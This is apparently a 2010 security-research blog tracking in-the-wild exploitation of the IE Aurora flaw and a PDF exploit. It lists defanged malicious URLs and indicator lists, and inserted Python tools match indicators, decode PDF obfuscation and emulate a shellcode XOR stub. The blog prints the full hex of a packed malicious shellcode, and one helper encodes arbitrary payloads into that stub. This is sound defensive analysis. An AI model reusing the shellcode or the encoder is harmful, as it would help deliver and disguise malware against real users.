Wednesday, January 27, 2010

using Robtex for fun and… (profit?)

While looking at some Robtex responses I found this amusing (and not especially useful) way to spend spare time. In this case, here is what Robtex says about "Google vs China" (Operation Aurora):

[screenshot of the Robtex graph]

Query used:

http://www.robtex.com/dot/www.google.com,72.14.204.103/20,as15169,72.14.204.103,chinese%20own%20google!1AS2,3NET1,4PTR0,1337A9,0UP4!4.png

Monday, January 25, 2010

CVE-2010-0249 in the wild – part 0.3

hxxxxp://h.d5d3.com/
(AS46475 LIMESTONENETWORKS Limestone Networks Inc.)

[screenshots]

MDecoder output:

[screenshot]

ThreatExpert Response:

http://www.threatexpert.com/report.aspx?md5=c229cac9ada74afaf59216fa67721be0

Sunday, January 24, 2010

CVE-2010-0249 in the wild – part 0.2

hxxxxp://www.qvodcom1.com/360/ie2.htm
(AS30058 FDCSERVERS AS for FDC Servers)

[screenshot]

Malzilla and MDecoder output:

[screenshot]

Wepawet analysis for hxxp://www.qvodcom1.com/360/ie2.htm:

http://wepawet.cs.ucsb.edu/view.php?hash=df830232d7e8735d15ead31b6835c30d&t=1264092203&type=js

(this post is under update)

Saturday, January 23, 2010

The extraexploit blog has been copied

I have found a blog that replicates some of my posts without any permission or request.

The links are: 
http://omercakir.wordpress.com/2010/01/23/cve-2010-0249-xx222-8866-org/
http://omercakir.wordpress.com/2010/01/20/cve-2010-0249-exploit-comele-hydraq-aurora-iexplorer-0day/

It is run by Ömer ÇAKIR. Can I use him as a backup :) ?

Yet another security blogger who reuses other bloggers' posts:
http://cybero-x.blogspot.com/2010/01/iexplorer-0day-cve-2010-0249-exploit.html

CVE-2010-0249 in the wild – part 0.1


hxxxxxp://mxd0102.3322.org/njk/index.htm
(AS4134 CHINA-TELECOM China Telecom)

[screenshot]

The URL above was requested with MDecoder 0.4 (http://mtian.net/down/MDecoder.zip), IMHO a very useful tool. As shown in the following picture, it detects a binary file downloaded from www.ynew.net:

[screenshot]

Some network info from Robtex about www.ynew.net:

[screenshot]

VirusTotal was used for a quick detection check:
http://www.virustotal.com/analisis/ee58cf8312b67d69559aa0c22e1256673a07f9617fea9bc360f33c273c05df1a-1264263391

and ThreatExpert for a quick analysis of the binary above (1.exe):
http://www.threatexpert.com/report.aspx?md5=499a5da8d1b644c50607cfa9a6007dbe

From the ThreatExpert report it seems to be one of the tons of ad hoc malware samples built for Chinese users.

Friday, January 22, 2010

CVE-2010-0249 in the wild - xx222.8866.org and others – part 0


(22/01/2010)

hxxxxxxxxxxtp://www.babooa562.com/xp/48/au.htm
(AS30058 FDCSERVERS AS for FDC Servers)

[screenshot]


hxxxxxxxxxxtp://www.tsqzsb.cn/xp/13/au.htm
(AS4134 CHINA-TELECOM China Telecom)

[screenshot]


hxxxxxxxxxp://www.fsus.cn:85/ss/au.htm
(AS35908  - VPLSNET)

[screenshot]


 hxxxxxxxxxp://googleie2.23sys23.cn/pz/au.htm
(AS4213 VPLSNET)

[screenshot]


hxxxxxxxxxp://www.ms8.cc/MyM/Cache/Tpl/safe.htm?13
(AS38356 TimeNet BeiJing Sincerity)

[screenshot]


hxxxxxxxxxp://malegebi251.21sys21.cn/pz/au.htm
(AS4213 VPLSNET)

[screenshot]

hxxxxxxxxxp://news.21npc.com/meteor/ver/ver.htm?772
(AS4134 CHINA-TELECOM China Telecom)

[screenshot]




(20/01/2010)
Using Google together with the information released by the McAfee Labs blog (http://bit.ly/69Pl4g), it may be trivial to find others.
 
In this case I found this one: hxxxxxxp://xx222.8866.org:2988/dz/ie.html

[screenshot]

Wepawet does not detect it.

Other URLs involved in the first spreading stage:

hxxxxxxp://xx222.8866.org:2988/dz/what.jpg    (shellcode)
hxxxxxxp://xx222.8866.org:2988/dz/Element
hxxxxxxp://xx222.8866.org:2988/dz/sdfasdfasdfafasdfafasdf.GIF

Other hosts:
hxxxxxxxp://tempxxp.3322.org:8277/log.css
hxxxxxxxxxp://201003.8866.org:2988/log/ie.html
hxxxxxxxxp://22cc.8866.org:2988/dz/ie.html
hxxxxxxxxp://201003.6600.org:2988/log/ie.html
hxxxxxxxxtp://201003.8800.org:2988/log/ie.html

(this post is under update)

Wednesday, January 20, 2010

IExplorer 0day CVE-2010-0249 – Exploit-Comele / Hydraq / Aurora

Microsoft has released an advisory about a possible "0 day" in Internet Explorer 6, 7 and 8. The issue was used in the recent attack against Google and other big companies through an Advanced Persistent Threat:

Why is it called Aurora? (old info)
http://www.chinadaily.com.cn/world/2007-09/27/content_6139437.htm

Operation Aurora: Clues in the Code
http://www.secureworks.com/research/blog/index.php/2010/01/20/operation-aurora-clues-in-the-code/

'Aurora' code circulated for years on English sites
http://www.theregister.co.uk/2010/01/26/aurora_attack_origins/

Report: Cyberattackers hit Google staff via friends
http://news.zdnet.co.uk/security/0,1000000189,40005860,00.htm?s_cid=248

Exploit related:
IE 0-Day on GOV.CN
http://research.zscaler.com/2010/01/ie-0-day-on-govcn.html

Internet Explorer 0-Day hosted GOV.CN domain
http://www.thetechherald.com/article.php/201004/5142/Internet-Explorer-0-Day-hosted-GOV-CN-domain

Hex-Rays against Aurora
http://hexblog.com/2010/01/hexrays_against_aurora.html

Python proof of concept:
http://packetstormsecurity.org/1001-exploits/ie_aurora.py.txt

Metasploit module / ie_aurora.rb
http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html
http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb

praetorianprefect - Demonstration of exploiting the flaw using the new module from Metasploit:
http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/

Additional information about DEP and the Internet Explorer 0day vulnerability
http://blogs.technet.com/srd/archive/2010/01/18/additional-information-about-dep-and-the-internet-explorer-0day-vulnerability.aspx

Bypassing Browser Memory Protections - DEP and others - (PDF document)
http://taossa.com/archive/bh08sotirovdowd.pdf
CVE-2010-0249 DEP/ASLR bypassed:
http://twitter.com/dinodaizovi

Another memory protection bypass reference:
http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/

DEP and ASLR bypass
http://blog.trendmicro.com/new-exploit-bypasses-aslr-and-dep/

Detection Rules:

Sourcefire VRT Rules Update - 2010-01-15
http://www.snort.org/vrt/advisories/2010/01/15/vrt-rules-2010-01-15.html/

Mitigation strategies:

Microsoft January Out of Band Patch
http://www.microsoft.com/technet/security/bulletin/MS10-002.mspx

Note: this out-of-band patch also covers the following CVEs:

CVE-2009-4074
CVE-2010-0027
CVE-2010-0244
CVE-2010-0245
CVE-2010-0246
CVE-2010-0247
CVE-2010-0248
CVE-2010-0249

Security Advisory 979352 – Going out of Band (Microsoft out-of-band patch)
http://blogs.technet.com/msrc/archive/2010/01/19/security-advisory-979352-going-out-of-band.aspx

Code to mitigate the exploit:
http://www.securityfocus.com/archive/1/508961

Green is good, red is bad (client side):
http://www.mywot.com

Malware related:

Aurora PCAP file
https://www.evilfingers.com/projects/pcaps_beta.php

The Trojan.Hydraq Incident
http://www.symantec.com/connect/blogs/trojanhydraq-incident

An Insight into the Aurora Communication Protocol
http://www.avertlabs.com/research/blog/index.php/2010/01/18/an-insight-into-the-aurora-communication-protocol/

Trojan.Hydraq Exposed
http://blog.threatexpert.com/2010_01_01_archive.html

Trojan.Hydraq Exposed  part II
http://blog.threatexpert.com/2010/01/trojanhydraq-part-ii.html

Roarur.dr
http://vil.nai.com/vil/content/v_253415.htm

Exploit-Comele
http://vil.nai.com/vil/content/v_253210.htm

News and old news about:

MS knew of Aurora exploit four months before Google attacks
http://www.theregister.co.uk/2010/01/22/aurora_exploit_known_months/

Security Intelligence: Attacking the Kill Chain
https://blogs.sans.org/computer-forensics/2009/10/14/security-intelligence-attacking-the-kill-chain/

Google-China cyber espionage saga – FAQ
http://blogs.zdnet.com/security/?p=5259&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+zdnet%2Fsecurity+%28ZDNet+Zero+Day%29&utm_content=Twitter

Cyber Espionage: Death by 1000 Cuts
http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20100119

France joins Germany warning against Internet Explorer
http://news.bbc.co.uk/2/hi/technology/8465038.stm
*Personal note: Firefox is exposed to several issues of this kind; for more info the Mozilla Bugzilla repository is a good starting point.

Attacks Continuing Against IE Flaw as Microsoft Preps Patch
http://threatpost.com/en_us/blogs/attacks-continuing-against-ie-flaw-microsoft-preps-patch-011810

More on the IE zero day
http://www.sophos.com/blogs/sophoslabs/?p=8227

IBM ISS Threat Level elevated to AlertCon 2
https://webapp.iss.net/gtoc/index.html

Security expert: Chinese authorities supported cyber attacks
http://blogs.zdnet.com/BTL/?p=29667

Incidents.org said “Exploit code available for CVE-2010-0249”
http://isc.sans.org/diary.html?storyid=8002

Microsoft confirms IE zero-day behind Google attack
http://www.networkworld.com/news/2010/011510-microsoft-confirms-ie-zero-day-behind.html

Vulnerability in Internet Explorer Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/979352.mspx

More Details on “Operation Aurora”
http://www.avertlabs.com/research/blog/index.php/2010/01/14/more-details-on-operation-aurora/

Operation “Aurora” Hit Google, Others
http://siblog.mcafee.com/cto/operation-%E2%80%9Caurora%E2%80%9D-hit-google-others/

0day vulnerability in Internet Explorer 6, 7 and 8
http://isc.sans.org/diary.html?storyid=7993

IE zero-day used in Chinese cyber assault on 34 firms
http://www.theregister.co.uk/2010/01/14/cyber_assault_followup/

Google Hack Attack Was Ultra Sophisticated
http://www.wired.com/threatlevel/2010/01/operation-aurora

Shellcode related:

wepawet
http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
A screenshot of the shellcode (md5 124722b0369b4a3dd42c6be6ecac425e) that I analyzed using the Wepawet shellcode hex dump and http://sandsprite.com/shellcode_2_exe.php to build it. The following shows the point in the code where the urlmon.dll method is used to download the binary "ad.jpg":

[screenshot]

VirusTotal detection for the extracted shellcode above (Comele exploit detected):
http://www.virustotal.com/analisis/d6507cef78269e631e7b6dc746fae49551962a11d80efbfd2ed13f21e00f6eb2-1263694821

Anubis detection for the extracted shellcode above:
http://anubis.iseclab.org/?action=result&task_id=1936ee7010fa1ae340d09531cafb64d66&format=

Analysis of Trojan.Hydraq , aka "Aurora," against Internet Explorer
http://www.wilderssecurity.com/showthread.php?p=1608756

Hydraq / Aurora network-related stuff:
Aurora files:
http://www.security.nl/files/aurorafiles.txt
from pastebin (http://pastebin.com/maad7ac3):
203.69.41.0/26
203.69.41.64/27
203.69.66.0/27
203.69.68.96/27
203.69.68.128/25
72.32.6.235

360.homeunix.com and others (parked at this time)
http://www.symantec.com/security_response/writeup.jsp?docid=2010-011114-1830-99&tabid=2


yahooo.8866.org (AS4766 KT-NET KORnet)
[screenshot]

sl1.homelinux.org
360.homeunix.com
ftp2.homeunix.com
update.ourhobby.com
blog1.servebeer.com
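The prefixes and dynamic-DNS hostnames listed above are only useful if they are actually checked against traffic. The following is an added example (not part of the original post) that loads those indicators and runs them over proxy log lines. The log format ("timestamp client url destination-ip") and every log line are constructed for this example; a real deployment would adapt the regex to the proxy's own format.

```python
"""Match proxy log lines against the Hydraq/Aurora network indicators above."""
import ipaddress
import re
from urllib.parse import urlsplit

# Indicators copied from the post: the pastebin prefixes and the
# dynamic-DNS hosts. The single host 72.32.6.235 is kept as a /32.
AURORA_PREFIXES = [ipaddress.ip_network(p) for p in (
    "203.69.41.0/26", "203.69.41.64/27", "203.69.66.0/27",
    "203.69.68.96/27", "203.69.68.128/25", "72.32.6.235/32",
)]
AURORA_HOSTS = {
    "yahooo.8866.org", "sl1.homelinux.org", "360.homeunix.com",
    "ftp2.homeunix.com", "update.ourhobby.com", "blog1.servebeer.com",
}

# Constructed sample log ("ts client url dst_ip"); the layout and the
# lines are assumptions for this example, not real traffic.
SAMPLE_LOG = """\
1263840001.123 10.0.0.5 http://www.example.com/index.html 93.184.216.34
1263840002.456 10.0.0.7 http://360.homeunix.com/e.txt 203.69.41.70
1263840003.789 10.0.0.9 https://update.microsoft.com/ 65.55.12.1
1263840004.000 10.0.0.5 http://203.69.68.200/x 203.69.68.200
1263840005.000 10.0.0.8 http://72.32.6.235:443/ 72.32.6.235
1263840006.000 10.0.0.5 http://203.69.41.95/ 203.69.41.95
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<url>\S+)\s+(?P<dst>\S+)$")


def ip_in_prefixes(addr, prefixes=AURORA_PREFIXES):
    """Return the matching prefix as a string, or None (also for non-IP input)."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return None
    for net in prefixes:
        if ip in net:
            return str(net)
    return None


def match_line(line):
    """Return a list of (indicator_type, detail) hits for one log line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return []
    hits = []
    # Hostname from the URL, so a literal-IP URL is checked against the CIDRs too.
    host = (urlsplit(m["url"]).hostname or "").lower()
    if host in AURORA_HOSTS:
        hits.append(("host", host))
    for label, addr in (("url-ip", host), ("dst-ip", m["dst"])):
        net = ip_in_prefixes(addr)
        if net:
            hits.append((label, f"{addr} in {net}"))
    return hits


def scan(log_text):
    """Return [(timestamp, client, hits)] for every line with at least one hit."""
    results = []
    for line in log_text.splitlines():
        hits = match_line(line)
        if hits:
            ts, client = line.split()[:2]
            results.append((ts, client, hits))
    return results


if __name__ == "__main__":
    for ts, client, hits in scan(SAMPLE_LOG):
        print(ts, client, hits)
```

Matching on the destination IP as well as the URL host catches the case where the dynamic-DNS name has already been resolved by the proxy and only the address is logged.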

This post is under update.

Monday, January 18, 2010

Is not a security bug but… (RDP - mstsc.exe / mstscax.dll crash)

This memory exception (under investigation) inside "mstscax.dll" was detected on one of my systems (XP SP3 updated with all MS bulletins; note that MS09-044 was related to RDP Client version 5.0):

[screenshot]

A closer view allows locating the method exposed by the ActiveX MSTSCAX.dll in which the issue is triggered (CClientHandler::GetAndParseXml(void)):

[screenshot]

The ActiveX DLL has the following properties:

[screenshot]

And the following version:

[screenshot]

The function above is called by only two functions, as shown:

[screenshot]

At this time I don't think it is a security issue that can be triggered remotely, but searching Google I found a good number of links reporting the same problem in older and more recent releases of MSTSC (RDP client):

http://www.google.com/#hl=en&q=mstscax.dll+crash

IMHO this kind of search query can be used to find other possible issues, since some of the links returned by Google point to developer forums; at the very least such queries give a good starting point for investigating (potentially buggy) code. A good example is given by the following query:

[screenshot]

Note: mshtml.dll is related to CVE-2010-0249.

Tuesday, January 12, 2010

Adobe CVE-2009-4324 – Another one with AsciiHexDecode waiting for the patch day

Many thanks to contagiodump for the following PDF:

http://contagiodump.blogspot.com/2010/01/jan-7-us-j-indiastrategicdialogue-from.html

In the document above, the following "not so rare" method of obfuscating the PDF directives was detected:

[screenshot]

In PDF name objects a #xx sequence stands for the character with hexadecimal code xx, so Adobe Reader evaluates these sequences as plain ASCII characters and the snippet above becomes the following:

[screenshot]

To decode the stream, pdf-parser.py was used and the object was dumped into clearObjects:

[screenshot]
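The two layers described above (#xx escapes hiding the name of the action and its filter, then an ASCIIHexDecode stream hiding the script) can be undone with a few lines of code. The following is an added example, not code from the post or from pdf-parser.py; the PDF object it works on is constructed for the example and only illustrates the technique, it is not the contagiodump sample.

```python
"""Undo #xx name escapes and ASCIIHexDecode streams in a PDF fragment."""
import re

# /Name tokens end at whitespace or a delimiter character.
NAME_RE = re.compile(r"/[^\s/\[\]<>(){}]+")
NAME_ESC_RE = re.compile(r"#([0-9A-Fa-f]{2})")

# Names that are interesting in a malicious PDF, compared after unescaping.
SUSPICIOUS = {"/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile"}

# Constructed sample: an action whose /S and /JS keys are hex-escaped, and a
# stream whose /Filter name is escaped and whose body is ASCIIHexDecode data.
SAMPLE_OBJECTS = """5 0 obj
<< /Type /Action /S /#4A#61#76#61#53#63#72#69#70#74 /#4A#53 6 0 R >>
endobj
6 0 obj
<< /Length 30 /Filter /#41#53#43#49#49#48#65#78#44#65#63#6F#64#65 >>
stream
76 61 72 20 78 20 3D 20 31 3B>
endstream
endobj
"""


def unescape_name(name):
    """Expand #xx escapes in one name token: /#4A#53 -> /JS."""
    return NAME_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), name)


def normalize_names(pdf_text):
    """Rewrite every /Name token in the fragment with its escapes expanded."""
    return NAME_RE.sub(lambda m: unescape_name(m.group(0)), pdf_text)


def suspicious_names(pdf_text):
    """Sorted list of the suspicious names present once escapes are removed."""
    found = set(NAME_RE.findall(normalize_names(pdf_text)))
    return sorted(found & SUSPICIOUS)


def ascii_hex_decode(data):
    """PDF ASCIIHexDecode filter: whitespace ignored, '>' is end-of-data and
    an odd trailing digit is padded with 0, as the PDF spec requires."""
    digits = re.sub(r"\s+", "", data.split(">", 1)[0])
    if not re.fullmatch(r"[0-9A-Fa-f]*", digits):
        raise ValueError("non-hex data in ASCIIHexDecode stream")
    if len(digits) % 2:
        digits += "0"
    return bytes.fromhex(digits)


# Flat (non-nested) dictionaries followed by a stream; the tempered dot keeps
# the dictionary match from running past its own '>>'.
STREAM_RE = re.compile(
    r"(\d+) 0 obj\s*<<((?:(?!>>).)*)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)


def decode_streams(pdf_text):
    """Return {object number: decoded bytes} for ASCIIHexDecode-filtered streams."""
    out = {}
    for num, dictionary, raw in STREAM_RE.findall(pdf_text):
        if "/ASCIIHexDecode" in NAME_RE.findall(normalize_names(dictionary)):
            out[int(num)] = ascii_hex_decode(raw)
    return out


if __name__ == "__main__":
    print(normalize_names(SAMPLE_OBJECTS))
    print(suspicious_names(SAMPLE_OBJECTS))
    print(decode_streams(SAMPLE_OBJECTS))
```

The point of normalizing names before matching is that a signature on the literal string "/JavaScript" never fires on the escaped form; pdf-parser.py and peepdf do the same expansion internally.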

An interesting decoded stream, at first look, is shown in the following screenshot:

[screenshot]

As already well reported on other websites and forums, the code is ready to be analyzed with tools such as Malzilla. So:

[screenshots]

The packed shellcode appears to be the following:

414141414141e801000000008b0c2483c4048d49124180316780399075f70d450f6
74b67670f677b67670f677767670f648067670f454b67670d670f42746667339b0f
f45583f30fa3ea78130fd55168740f30016a980f3648c5660f5e851ae40fe8957f0
60f24d9cbbc0f8ac898d30fce45fec60fe9746dcb0ffce0ec82ec93ea19b754bcd0
634c843354b503ec3d57ec2c6bec2e7bec6eec0e6fca5af45583f3126707ec225be
c2b621f64aaec3e4764ba549820ec53dc6492fe68d9615da3136fa6ad6064b7218c
965c33437b1283ec3e4364ba01ec5b1cec3e7b64ba644bdcf238cc30065af45583f
312c9e68b676f6767ec8bec209be4a762ee209bec208be4a762ee208b0d679830b7
54ae54bce75f5d12662426e75b6f5d129e24e49c6512942e64a6eee26766676754a
e26e75b6f45129ea1636f670d670fe76767670d640d670d640f676767e7ecd26766
6767318f676767673fe4a76a3732ec8bec209b9887ee2053320f6766676798308fe
ad267666767310d670d67329830bf0d670d670d650d670d670f67676727318f6767
67673fe4a76a3732ec8bec209b9887e49f6768e90b656767eee267616767ec3823e
c10530d670d673431983087ec382fa0e263616767676367670d67eae26760676737
0f67636767eae26765676737ec105331983093eca44a67636767e49f671861eefa6
361676754aeead36a67656767cb55a6a7af64e09deadb6a67656767cde09d265cea
6361676712b90d67eae2636067673798d263616767eae2676567673798d26761676
798309fe68c67636767e49c6718e398d2676167679830970d67ead267666767318f
676767673fe4a76a3732ec8bec208b98870d670d6798102b9810539830870d67eae
26760676737981037eae2676667673798105398309354a727e71b626767129fec28
37e09cea1b6267ead26766676794c3e09c0d670d670d650d670d670f67676727328
f676767673fe4a76a3732ec8bec209b9887e49f6768e95b666767eee267616767ec
385bec10530d670d673431983087ec3827a0e263616767676367670d67eae267606
767370f67636767eae2676567673731983093eca44a67636767e49f671861eefa63
6167670d67eae2636067673798d263616767eae2676567673798d26761676798309
fe68c67636767e49c6718cc98d267616767983097ead2676667670f67666767310d
679830bba1e2986767674554ae26e7db6a67666767671292a0e36a6766676745474
814e4a66301a0e36a676667674745e4a665e09c54b5ea137267cbeadb6a67666767
cd26255b67128a2ea1e36a6766676745a0e28c676767242a2349a0e288676767223
f224701a0e2946767674804a1e29267676747a0e2916767671306140ca0e29d6767
670b0e1413a1e29967676741e09ceae28c6767670d67378f676767673fe4a76a373
2ec8bec208b98870d670d98983083f7f7f7f7f7f7f70000

The VirusTotal response:

http://www.virustotal.com/analisis/6b11d73965e62de381f2ea9b2f3de4fdbf461e970fee8cb4b90e7a62f88c2aa0-1263296898

The ThreatExpert response:
http://www.threatexpert.com/report.aspx?md5=88a653e2d85649e0b4ae48a1dd711f5e

At first sight the shellcode needs to be run in the Adobe PDF Reader context.
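The dump above is "packed" only by a short self-decoding stub: disassembling its first 30 bytes gives six INC ECX pad bytes (0x41) followed by a GetPC trick and a loop that XORs every following byte with 0x67 until the decoded byte equals 0x90. The following is an added example, not from the post, that recognises that stub shape (any key, terminator and displacement) and replays it in Python on the hex exactly as printed above, so the payload can be inspected or fed to a disassembler without running it. The `encode` helper that builds a stub of the same shape around an arbitrary payload is an assumption added for round-trip testing.

```python
"""Emulate the self-decoding XOR stub at the head of the packed shellcode above.

Disassembly of the stub (offsets 6..29 of the dump):

    e8 01 00 00 00        call  +1            ; push return address, skip 1 byte
    8b 0c 24              mov   ecx, [esp]    ; ecx = return address (GetPC)
    83 c4 04              add   esp, 4
    8d 49 12              lea   ecx, [ecx+0x12]
    41            loop:   inc   ecx
    80 31 67              xor   byte [ecx], 0x67
    80 39 90              cmp   byte [ecx], 0x90
    75 f7                 jne   loop
"""
import re
import struct

# Packed shellcode exactly as printed in the post; the dump is wrapped at
# 67 hex digits per line, so the pieces must be joined before parsing.
PACKED_HEX = "".join([
    "414141414141e801000000008b0c2483c4048d49124180316780399075f70d450f6",
    "74b67670f677b67670f677767670f648067670f454b67670d670f42746667339b0f",
    "f45583f30fa3ea78130fd55168740f30016a980f3648c5660f5e851ae40fe8957f0",
    "60f24d9cbbc0f8ac898d30fce45fec60fe9746dcb0ffce0ec82ec93ea19b754bcd0",
    "634c843354b503ec3d57ec2c6bec2e7bec6eec0e6fca5af45583f3126707ec225be",
    "c2b621f64aaec3e4764ba549820ec53dc6492fe68d9615da3136fa6ad6064b7218c",
    "965c33437b1283ec3e4364ba01ec5b1cec3e7b64ba644bdcf238cc30065af45583f",
    "312c9e68b676f6767ec8bec209be4a762ee209bec208be4a762ee208b0d679830b7",
    "54ae54bce75f5d12662426e75b6f5d129e24e49c6512942e64a6eee26766676754a",
    "e26e75b6f45129ea1636f670d670fe76767670d640d670d640f676767e7ecd26766",
    "6767318f676767673fe4a76a3732ec8bec209b9887ee2053320f6766676798308fe",
    "ad267666767310d670d67329830bf0d670d670d650d670d670f67676727318f6767",
    "67673fe4a76a3732ec8bec209b9887e49f6768e90b656767eee267616767ec3823e",
    "c10530d670d673431983087ec382fa0e263616767676367670d67eae26760676737",
    "0f67636767eae26765676737ec105331983093eca44a67636767e49f671861eefa6",
    "361676754aeead36a67656767cb55a6a7af64e09deadb6a67656767cde09d265cea",
    "6361676712b90d67eae2636067673798d263616767eae2676567673798d26761676",
    "798309fe68c67636767e49c6718e398d2676167679830970d67ead267666767318f",
    "676767673fe4a76a3732ec8bec208b98870d670d6798102b9810539830870d67eae",
    "26760676737981037eae2676667673798105398309354a727e71b626767129fec28",
    "37e09cea1b6267ead26766676794c3e09c0d670d670d650d670d670f67676727328",
    "f676767673fe4a76a3732ec8bec209b9887e49f6768e95b666767eee267616767ec",
    "385bec10530d670d673431983087ec3827a0e263616767676367670d67eae267606",
    "767370f67636767eae2676567673731983093eca44a67636767e49f671861eefa63",
    "6167670d67eae2636067673798d263616767eae2676567673798d26761676798309",
    "fe68c67636767e49c6718cc98d267616767983097ead2676667670f67666767310d",
    "679830bba1e2986767674554ae26e7db6a67666767671292a0e36a6766676745474",
    "814e4a66301a0e36a676667674745e4a665e09c54b5ea137267cbeadb6a67666767",
    "cd26255b67128a2ea1e36a6766676745a0e28c676767242a2349a0e288676767223",
    "f224701a0e2946767674804a1e29267676747a0e2916767671306140ca0e29d6767",
    "670b0e1413a1e29967676741e09ceae28c6767670d67378f676767673fe4a76a373",
    "2ec8bec208b98870d670d98983083f7f7f7f7f7f7f70000",
])

DECODER_RE = re.compile(
    rb"\xe8(.{4})"          # call rel32 (GetPC trick)
    rb"(.*?)"               # the rel32 bytes the call jumps over
    rb"\x8b\x0c\x24"        # mov ecx, [esp]
    rb"\x83\xc4\x04"        # add esp, 4
    rb"\x8d\x49(.)"         # lea ecx, [ecx+disp8]
    rb"\x41"                # inc ecx            <- loop head
    rb"\x80\x31(.)"         # xor byte [ecx], key
    rb"\x80\x39(.)"         # cmp byte [ecx], terminator
    rb"\x75\xf7",           # jne loop (-9)
    re.DOTALL,
)


def find_decoder(blob):
    """Locate the stub: (call_offset, rel32, disp8, key, terminator) or None."""
    m = DECODER_RE.search(blob)
    if m is None:
        return None
    rel32 = struct.unpack("<i", m.group(1))[0]
    if rel32 != len(m.group(2)):
        return None  # the CALL would not land on the MOV ECX,[ESP]
    disp8 = struct.unpack("<b", m.group(3))[0]
    return m.start(), rel32, disp8, m.group(4)[0], m.group(5)[0]


def decode(blob):
    """Replay the stub; returns (decoded bytes, offset of the first decoded byte)."""
    info = find_decoder(blob)
    if info is None:
        raise ValueError("XOR decoder stub not found")
    call_off, _rel32, disp8, key, term = info
    ecx = (call_off + 5) + disp8      # return address pushed by CALL, then LEA
    start = ecx + 1                   # INC ECX runs before the first XOR
    out = bytearray()
    while True:
        ecx += 1                      # inc ecx
        if ecx >= len(blob):
            raise ValueError("buffer ended before the terminator byte")
        b = blob[ecx] ^ key           # xor byte [ecx], key
        out.append(b)
        if b == term:                 # cmp byte [ecx], term / jne loop
            break
    return bytes(out), start


def encode(payload, key, term):
    """Wrap a payload in a stub of the same shape (call rel32 = 0, so no byte
    is skipped) for round-trip tests. The payload must not contain `term`,
    because the loop stops at the first decoded byte equal to it."""
    if term in payload:
        raise ValueError("payload contains the terminator byte")
    stub = (b"\xe8\x00\x00\x00\x00"            # call +0: return address = 5
            b"\x8b\x0c\x24\x83\xc4\x04"
            b"\x8d\x49" + bytes([23 - 5 - 1])   # lea so that ecx+1 == 23 (stub length)
            + b"\x41\x80\x31" + bytes([key])
            + b"\x80\x39" + bytes([term])
            + b"\x75\xf7")
    return stub + bytes(b ^ key for b in payload) + bytes([term ^ key])


if __name__ == "__main__":
    payload, start = decode(bytes.fromhex(PACKED_HEX))
    print(f"decoded {len(payload)} bytes starting at offset {start}")
    print(payload[:16].hex())
```

The decoded buffer is what should be handed to a disassembler or to a tool such as sctest; the stub itself is the reason VirusTotal and ThreatExpert see only a generic XOR loader until the loop has run.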

Friday, January 8, 2010

Trying to analyze VISPA ISP Outage

The Register (http://www.theregister.co.uk/2010/01/08/vispa_ddoa/) has published today a story about an outage (caused by a DDoS from Latvia) at the VISPA ISP (AS29129 VISPA-ASN). The attack seems to have come from the Baltic area and lasted about 12 hours (between 1:00 AM and 12:30 PM). The following analysis is to be taken only as an attempt to verify the DDoS behaviour and nothing else.

For this purpose the VISPA-CORE IP prefix (83.217.160.0/19) was used:

[screenshot of the prefix list]
The screenshots are generated by BGPlay (http://bgplay.routeviews.org/bgplay/):
Time: 2010-01-08 08:44:10
[screenshot]
Time: 2010-01-08 09:51:49
[screenshot]
Time: 2010-01-08 10:36:47
[screenshot]
Time: 2010-01-08 11:17:49 (apparently no more BGP updates for the AS)
[screenshot]
Time: 2010-01-08 12:22:30
[screenshot]
Feedback is welcome.